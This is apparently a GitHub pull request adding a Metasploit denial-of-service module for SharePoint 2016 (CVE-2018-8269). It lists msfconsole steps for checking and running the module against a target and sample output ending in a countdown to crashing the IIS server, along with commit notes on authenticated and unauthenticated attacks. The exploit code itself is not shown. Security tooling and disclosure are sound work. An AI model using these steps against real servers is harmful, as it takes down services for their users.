Microsoft SharePoint 2016 DOS - CVE-2018-8269 #11214

Open: wants to merge 6 commits into base: master

waveburst commented Jan 9, 2019

This is a DoS exploit for Microsoft SharePoint 2016 Server, according to research done by the Aleph Security Team by HCL Technologies (CVE-2018-8269). More details can be found here:
https://alephsecurity.com/2018/10/22/StackOverflowException/

Verification

1. Start msfconsole
2. use auxiliary/dos/windows/http/sp16_dos
3. set VHOST victim.sharepoint.com and set RHOSTS victim.sharepoint.com
4. If needed by the server, set USERNAME evil and set PASSWORD p@ssword
5. check - checks if the server is vulnerable and should not crash the server.
6. run - use with CAUTION. This will crash the IIS server when the countdown reaches 1.

Scenarios

msf5 auxiliary(dos/windows/http/sp16_dos) > check

[*] 13.107.136.9:443 - Fetching Authentication Cookie
[*] 13.107.136.9:443 - Sending innocent request...
[+] 13.107.136.9:443 - Server responded 200 to innocent request
[*] 13.107.136.9:443 - Sending malicious request...
[+] 13.107.136.9:443 - The target is vulnerable.

----------------------------------
msf5 auxiliary(dos/windows/http/sp16_dos) > run

[*] hclo365.sharepoint.com:443 - Fetching Authentication Cookie
[*] hclo365.sharepoint.com:443 - Sending innocent request...
[+] hclo365.sharepoint.com:443 - Server responded 200 to innocent request
[*] hclo365.sharepoint.com:443 - Sending malicious request...
[*] hclo365.sharepoint.com:443 - Sending DOS malicious requests...
[*] hclo365.sharepoint.com:443 - Countdown 10...
[*] hclo365.sharepoint.com:443 - Countdown 9...
[*] hclo365.sharepoint.com:443 - Countdown 8...
....
[*] hclo365.sharepoint.com:443 - Countdown 1...

@waveburst waveburst closed this Jan 9, 2019


waveburst commented Jan 9, 2019

Pausing pull request to revisit exploit operation.

wave added some commits Jan 17, 2019

wave
SITES option added - In some cases the malicious request needs to target an
available site. This option might be self-set by 'get_available_site'

waveburst commented Jan 20, 2019

The exploit now supports authenticated attacks as well as unauthenticated attacks (for public servers).
Also, if needed, the exploit tries to search for an available site to execute a successful attack.

@waveburst waveburst reopened this Jan 20, 2019
